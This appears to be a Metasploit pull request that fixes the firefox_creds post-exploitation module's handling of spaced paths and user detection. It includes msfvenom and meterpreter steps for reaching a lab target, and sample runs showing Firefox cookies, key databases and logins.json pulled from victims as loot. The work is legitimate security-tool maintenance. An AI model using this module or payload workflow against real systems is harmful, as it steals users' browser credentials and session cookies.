### PR TITLE
Try harder to get user id, correctly handle dirs with spaces.

### DIFF
--- a/modules/post/multi/gather/firefox_creds.rb
+++ b/modules/post/multi/gather/firefox_creds.rb
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
       omnija = read_file(@paths['ff'] + org_file)
       if omnija.nil? or omnija.empty? or omnija =~ /No such file/i
         print_error("Could not download: #{@paths['ff'] + org_file}")
-        print_error("Tip: Try swtiching to a meterpreter shell if possible (as its more reliable/stable when downloading)") if session.type != "meterpreter"
+        print_error("Tip: Try switching to a meterpreter shell if possible (as it's more reliable/stable when downloading)") if session.type != "meterpreter"
         return
       end
 
@@ -249,8 +249,8 @@ class MetasploitModule < Msf::Post
 
       if got_root
         vprint_status("Detected ROOT privileges. Searching every account on the target system.")
-        userdirs = cmd_exec("find #{home} -maxdepth 1 -mindepth 1 2>/dev/null").gsub(/\s/, "\n")
-        userdirs << "/root\n"
+        userdirs = "/root\n"
+        userdirs << cmd_exec("find #{home} -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
       else
         vprint_status("Checking #{id}'s Firefox account")
         userdirs = "#{home + id}\n"
@@ -260,16 +260,16 @@ class MetasploitModule < Msf::Post
         dir.chomp!
         next if dir == "." or dir == ".." or dir =~ /No such file/i
 
-        @platform == :osx ? (basepath = "#{dir}/Library/Application\\ Support/Firefox/Profiles/") : (basepath = "#{dir}/.mozilla/firefox/")
+        @platform == :osx ? (basepath = "#{dir}/Library/Application Support/Firefox/Profiles") : (basepath = "#{dir}/.mozilla/firefox")
 
         print_status("Checking for Firefox profile in: #{basepath}")
-        checkpath = cmd_exec("ls #{basepath}").gsub(/\s/, "\n")
+        checkpath = cmd_exec("find " + basepath.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
 
         checkpath.each_line do |ffpath|
           ffpath.chomp!
-          if ffpath =~ /\.default/
-            vprint_good("Found profile: #{basepath + ffpath}")
-            paths << "#{basepath + ffpath}"
+          if ffpath =~ /\.default$/
+            vprint_good("Found profile: #{ffpath}")
+            paths << "#{ffpath}"
           end
         end
       end
@@ -332,7 +332,7 @@ class MetasploitModule < Msf::Post
       profile = path.scan(/Profiles[\\|\/](.+)\.(.+)$/).flatten[0].to_s
       profile = path.scan(/firefox[\\|\/](.+)\.(.+)$/).flatten[0].to_s if profile.empty?
 
-      session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec("ls #{path} 2>/dev/null").split())
+      session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec("find "+ path.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type f 2>/dev/null").gsub(/.*\//, "").split("\n"))
 
       files.each do |file|
         file.chomp!
@@ -551,12 +551,18 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     when :unix
       # Assuming userdir /home/(x) = user
       print_status("Enumerating users")
-      users = cmd_exec("ls /home 2>/dev/null")
-      if users.nil? or users.empty?
+      homedirs = cmd_exec("find /home -maxdepth 1 -mindepth 1 -type d 2>/dev/null").gsub(/.*\//, "")
+      if homedirs.nil? or homedirs.empty?
         print_error("No normal user found")
         return false
       end
-      user = users.split[0]
+      user = nil
+      # Skip home directories which contain a space, as those are likely not usernames...
+      homedirs.each_line do |homedir|
+        user = homedir.chomp
+        break unless user.index(" ")
+      end
+
       # Since we can't access the display environment variable we have to assume the default value
       args.insert(0, "\"#{@paths['ff']}firefox --display=:0 ")
       args << "\""
@@ -719,6 +725,10 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
       session.sys.config.getuid =~ /SYSTEM/ ? true : false
     else   # unix, bsd, linux, osx
       id_output = cmd_exec("id").chomp
+      if id_output.blank?
+        # try an absolute path
+        id_output = cmd_exec("/usr/bin/id").chomp
+      end
       id_output.include?("uid=0(") ? true : false
     end
   end


### PR DESCRIPTION
Fixes #7817.

This patch fixes some improper behavior when using the post/multi/gather/firefox_creds module.  It should run better on [Kali linux](https://github.com/rapid7/metasploit-framework/issues/7817) now, as well as dealing correctly with directories that contain spaces.

NOTE: it appears there are some other issues with firefox_creds related to the decrypt functionality, such as not finding the Firefox install on Kali (which appears to be in /usr/lib/firefox-esr/) and an error with OS X related to not finding the omni.ja file.

## Verification

The following steps illustrate how to verify this fix with a Python Meterpreter payload:

- [x] Create a standalone payload for your target with `./msfvenom -p python/meterpreter/bind_tcp lport=4444 -f elf -o my_payload`
- [x] Copy your new standalone payload over to your target system.
- [x] On your target, start your standalone payload as an unprivileged user.
- [x] Start `msfconsole`
- [x] `use exploit/multi/handler`
- [x] `set payload python/meterpreter/bind_tcp`
- [x] `set rhost <IP of your target>`
- [x] `run`
- [x] **Verify** you get a `meterpreter >` prompt
- [x] `getuid`
- [x] `run post/multi/gather/firefox_creds`
- [x] **Verify** the module attempts to look for a Firefox profile for the user your payload is executing under.
- [x] If this user does have a Firefox profile setup, **Verify** the module reports that files are downloaded as loot. 
- [x] Exit your meterpreter session: `exit`
- [x] On your target, restart your standalone payload as a privileged user.
- [x] On msfconsole:`run`
- [x] **Verify** you get a `meterpreter >` prompt
- [x] `getuid`
- [x] `run post/multi/gather/firefox_creds`
- [x] **Verify** the module attempts to look for a Firefox profile for *ALL* users on your target.
- [x] If any users have a Firefox profile setup, **Verify** the module reports that files are downloaded as loot. 

---------------------

## Some example runs with this patch in place

#### Kali Linux - Rolling (x86 Meterpreter)
```
meterpreter > sysinfo
Computer     : kali
OS           : Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) (x86_64)
Architecture : x64
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > run post/multi/gather/firefox_creds

[*] Checking for Firefox profile in: /root/.mozilla/firefox
[*] Checking for Firefox profile in: /home/foo 2/.mozilla/firefox

[*] Profile: /root/.mozilla/firefox/flrwbjxp.default
[+] Downloaded cookies.sqlite: /home/pbarry/.msf4/loot/20170225201209_default_10.0.2.40_ff.flrwbjxp.cook_617327.bin
[+] Downloaded key3.db: /home/pbarry/.msf4/loot/20170225201209_default_10.0.2.40_ff.flrwbjxp.key3_678685.db
[+] Downloaded cert8.db: /home/pbarry/.msf4/loot/20170225201210_default_10.0.2.40_ff.flrwbjxp.cert_127282.db

[*] Profile: /home/foo 2/.mozilla/firefox/qcwvebrn.default
[+] Downloaded cookies.sqlite: /home/pbarry/.msf4/loot/20170225201210_default_10.0.2.40_ff.qcwvebrn.cook_811056.bin
[+] Downloaded key3.db: /home/pbarry/.msf4/loot/20170225201211_default_10.0.2.40_ff.qcwvebrn.key3_171866.db
[+] Downloaded cert8.db: /home/pbarry/.msf4/loot/20170225201211_default_10.0.2.40_ff.qcwvebrn.cert_136993.db
```

#### Kali Linux - Rolling (shell)
```
msf exploit(handler) > use post/multi/gather/firefox_creds
msf post(firefox_creds) > run

[*] Checking for Firefox profile in: /root/.mozilla/firefox
[*] Checking for Firefox profile in: /home/foo 2/.mozilla/firefox

[*] Profile: /root/.mozilla/firefox/flrwbjxp.default
[+] Downloaded cookies.sqlite: /home/pbarry/.msf4/loot/20170225202206_default_10.0.2.40_ff.flrwbjxp.cook_634649.bin
[+] Downloaded key3.db: /home/pbarry/.msf4/loot/20170225202206_default_10.0.2.40_ff.flrwbjxp.key3_219803.db
[+] Downloaded cert8.db: /home/pbarry/.msf4/loot/20170225202207_default_10.0.2.40_ff.flrwbjxp.cert_633609.db

[*] Profile: /home/foo 2/.mozilla/firefox/qcwvebrn.default
[+] Downloaded cookies.sqlite: /home/pbarry/.msf4/loot/20170225202217_default_10.0.2.40_ff.qcwvebrn.cook_926101.bin
[+] Downloaded key3.db: /home/pbarry/.msf4/loot/20170225202217_default_10.0.2.40_ff.qcwvebrn.key3_623926.db
[+] Downloaded cert8.db: /home/pbarry/.msf4/loot/20170225202217_default_10.0.2.40_ff.qcwvebrn.cert_821980.db

[*] Post module execution completed
msf post(firefox_creds) > set decrypt true
decrypt => true
msf post(firefox_creds) > set disclaimer true
disclaimer => true
msf post(firefox_creds) > run

[-] No Firefox directory found
[*] Post module execution completed
```

#### OS X - Sierra (python Meterpreter)
```
meterpreter > sysinfo
Computer        : XXXXXXXX.local
OS              : Darwin 16.4.0 Darwin Kernel Version 16.4.0: Thu Dec 22 22:53:21 PST 2016; root:xnu-3789.41.3~3/RELEASE_X86_64
Architecture    : x64
System Language : en_US
Meterpreter     : python/osx
meterpreter > getuid
Server username: bob
meterpreter > run post/multi/gather/firefox_creds 

[*] Checking for Firefox profile in: /Users/bob/Library/Application Support/Firefox/Profiles

[*] Profile: /Users/bob/Library/Application Support/Firefox/Profiles/gjgeuoac.default
[+] Downloaded cert8.db: /home/pbarry/.msf4/loot/20170225191030_default_10.0.2.40_ff.gjgeuoac.cert_021827.db
[+] Downloaded cookies.sqlite: /home/pbarry/.msf4/loot/20170225191030_default_10.0.2.40_ff.gjgeuoac.cook_818729.bin
[+] Downloaded key3.db: /home/pbarry/.msf4/loot/20170225191030_default_10.0.2.40_ff.gjgeuoac.key3_852482.db
[+] Downloaded logins.json: /home/pbarry/.msf4/loot/20170225191030_default_10.0.2.40_ff.gjgeuoac.logi_853778.bin

meterpreter > run post/multi/gather/firefox_creds decrypt=true,disclaimer=true

[+] Found Firefox directory: /applications
[-] Could not download omni.ja. File does not exist.
```

#### OS X - Sierra (shell)
```
msf post(firefox_creds) > run

[*] Checking for Firefox profile in: /Users/bob/Library/Application Support/Firefox/Profiles

[*] Profile: /Users/bob/Library/Application Support/Firefox/Profiles/gjgeuoac.default
[+] Downloaded cert8.db: /home/pbarry/.msf4/loot/20170225193438_default_10.0.2.40_ff.gjgeuoac.cert_696233.db
[+] Downloaded cookies.sqlite: /home/pbarry/.msf4/loot/20170225193438_default_10.0.2.40_ff.gjgeuoac.cook_954479.bin
[+] Downloaded key3.db: /home/pbarry/.msf4/loot/20170225193438_default_10.0.2.40_ff.gjgeuoac.key3_271602.db
[+] Downloaded logins.json: /home/pbarry/.msf4/loot/20170225193439_default_10.0.2.40_ff.gjgeuoac.logi_703726.bin

[*] Post module execution completed
msf post(firefox_creds) > set decrypt true
decrypt => true
msf post(firefox_creds) > set disclaimer true
disclaimer => true
msf post(firefox_creds) > run

[+] Found Firefox directory: /applications
[*] Downloading /applications/firefox.app/contents/macos/omni.ja to: /tmp/eKxhMH.ja 
[-] Could not download: /applications/firefox.app/contents/macos/omni.ja
[-] Tip: Try switching to a meterpreter shell if possible (as it's more reliable/stable when downloading)
[*] Post module execution completed
```

#### Windows - 8.1 (x86 Meterpreter):
```
meterpreter > sysinfo
Computer        : WINDOWS81-XX
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WINDOWS81-XX\Bob
meterpreter > run post/multi/gather/firefox_creds 

[*] Checking for Firefox profile in: C:\Users\Bob\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\Bob\AppData\Roaming\Mozilla\Firefox\Profiles\lzublo4t.default
[+] Downloaded cert8.db: /home/pbarry/.msf4/loot/20170225184324_default_10.0.2.5_ff.lzublo4t.cert_818486.bin
[+] Downloaded cookies.sqlite: /home/pbarry/.msf4/loot/20170225184325_default_10.0.2.5_ff.lzublo4t.cook_166522.bin
[+] Downloaded key3.db: /home/pbarry/.msf4/loot/20170225184326_default_10.0.2.5_ff.lzublo4t.key3_752381.bin

meterpreter > run post/multi/gather/firefox_creds decrypt=true,disclaimer=true

[!] You may need SYSTEM privileges on this platform for the DECRYPT option to work
[+] Found Firefox directory: C:\Program Files (x86)
[*] Downloading C:\Program Files (x86)\Mozilla Firefox\omni.ja to: /tmp/iUEqL.ja (9.68 MB)
[*] Injecting into: /tmp/iUEqL.ja
[-] Was not able to find 'components/storage-mozStorage.js' in the compressed .JA file
[-] This could be due to a corrupt download or a unsupported Firefox/Iceweasel version
[-] Failed to inject
```